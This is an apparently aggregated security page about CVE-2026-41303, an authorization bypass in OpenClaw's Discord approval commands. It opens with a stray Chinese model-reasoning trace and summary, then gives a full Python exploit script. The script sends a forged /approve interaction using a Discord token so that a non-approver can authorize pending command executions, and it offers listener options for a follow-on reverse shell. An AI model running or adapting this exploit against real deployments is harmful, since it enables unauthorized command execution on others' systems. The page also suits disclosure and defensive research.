好的,我现在需要帮用户总结一篇关于OpenClaw漏洞的文章,控制在100字以内。首先,我得仔细阅读用户提供的内容,理解文章的核心信息。 用户提供的文章看起来是一个Python脚本的漏洞利用代码,涉及OpenClaw的Discord文本审批授权绕过问题。漏洞编号是CVE-2026-41303,影响版本是2026.3.28之前的版本。作者是Mohammed Idrees Banyamer,来自约旦。 文章描述了这个漏洞允许非审批人员绕过审批流程,批准执行命令。利用方法包括发送特定的Discord交互请求,绕过授权检查。修复版本是2026.3.28。 接下来,我需要将这些关键点浓缩到100字以内。重点包括:漏洞名称、影响范围、漏洞类型、绕过机制、修复版本以及可能的影响。 考虑到用户要求直接描述内容,不需要开头语句,所以我会直接列出主要信息。确保涵盖所有关键点:软件名称、漏洞类型、影响版本、攻击者的能力、修复版本以及CVSS评分。 最后,检查字数是否符合要求,并确保语言简洁明了。 </think> OpenClaw < 2026.3.28 存在 Discord 文本审批授权绕过漏洞(CVE-2026-41303),允许非审批人员绕过待处理执行审批的审批者列表。该漏洞通过发送特定的 Discord 交互请求实现授权绕过。修复版本为 2026.3.28。 2026-4-22 21:53:45 Author: cxsecurity.com(查看原文) 阅读量:16 收藏
OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass
#!/usr/bin/env python3 # Exploit Title: OpenClaw Discord Text Approval Authorization Bypass # CVE: CVE-2026-41303 # Date: 2026-04-21 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://github.com/openclaw/openclaw # Software Link: https://github.com/openclaw/openclaw # Affected: OpenClaw < 2026.3.28 # Tested on: OpenClaw 2026.3.24 # Category: Authorization Bypass # Platform: Linux / Discord # Exploit Type: Remote # CVSS: 8.8 # CWE : CWE-863 # Description: OpenClaw before 2026.3.28 contains an authorization bypass vulnerability in Discord text approval commands that allows non-approvers to resolve pending exec approvals. # Fixed in: 2026.3.28 # Usage: # python3 exploit.py <target> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py https://openclaw.example.com --lhost 192.168.1.100 --lport 4444 # # Options: # # Notes: # This is a simple PoC script that demonstrates the authorization bypass. # It requires a Discord user token with access to the channel where OpenClaw bot is present. # The script sends the /approve slash command to bypass the approvers list. # # How to Use # # Step 1: Obtain a pending approval ID from the OpenClaw Discord channel. # Step 2: Run the exploit with your Discord token, channel ID, approval ID, and decision. print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-41303 • OpenClaw Discord Approval Bypass ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import argparse import requests import json import time def main(): parser = argparse.ArgumentParser(description="CVE-2026-41303 - OpenClaw Discord Approval Bypass PoC") parser.add_argument("target", help="OpenClaw instance URL or Discord guild/channel context") parser.add_argument("--token", required=True, help="Discord user or bot token") parser.add_argument("--channel-id", required=True, help="Discord channel ID where the bot listens") parser.add_argument("--approval-id", required=True, help="Pending approval ID to bypass") parser.add_argument("--decision", default="allow-once", choices=["allow-once", "allow-always"], help="Approval decision") parser.add_argument("--lhost", help="Your listener IP (for reverse shell if approval triggers RCE)") parser.add_argument("--lport", help="Your listener port") args = parser.parse_args() print("[+] Starting CVE-2026-41303 PoC by @banyamer_security") print(f"[+] Target : {args.target}") print(f"[+] Channel ID : {args.channel_id}") print(f"[+] Approval ID : {args.approval_id}") print(f"[+] Decision : {args.decision}") if args.lhost and args.lport: print(f"[+] Listener : {args.lhost}:{args.lport} (for post-approval payload)") # Build Discord interaction payload for /approve command payload = { "type": 2, # APPLICATION_COMMAND "application_id": "OPENCLAW_BOT_APP_ID", # Replace with actual OpenClaw bot application ID if known "guild_id": "YOUR_GUILD_ID", # Optional - fill if needed "channel_id": args.channel_id, "data": { "name": "approve", "options": [ {"name": "id", "value": args.approval_id}, {"name": "decision", "value": args.decision} ] } } headers = { "Authorization": f"{args.token}", "Content-Type": "application/json" } print("[+] Sending unauthorized /approve command via Discord API...") try: r = requests.post( "https://discord.com/api/v10/interactions", json=payload, headers=headers, timeout=10 ) print(f"[+] HTTP Status: {r.status_code}") if r.status_code in [200, 204]: print("[+] Success! The approval was processed without checking the approvers list.") print("[+] Non-approver successfully bypassed authorization (CVE-2026-41303).") if args.lhost and args.lport: print("[+] If the approved command spawns a shell, you should receive a connection shortly.") elif r.status_code == 401: print("[-] Invalid Discord token.") else: print(f"[-] Unexpected response: {r.text[:500]}") except Exception as e: print(f"[-] Error: {e}") print("\n[+] PoC completed. Patch to OpenClaw >= 2026.3.28 immediately.") print("[+] Credit: Mohammed Idrees Banyamer (@banyamer_security)") if __name__ == "__main__": main()
References:
https://github.com/openclaw/openclaw/security/advisories/GHSA-98hh-7ghg-x6rq
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh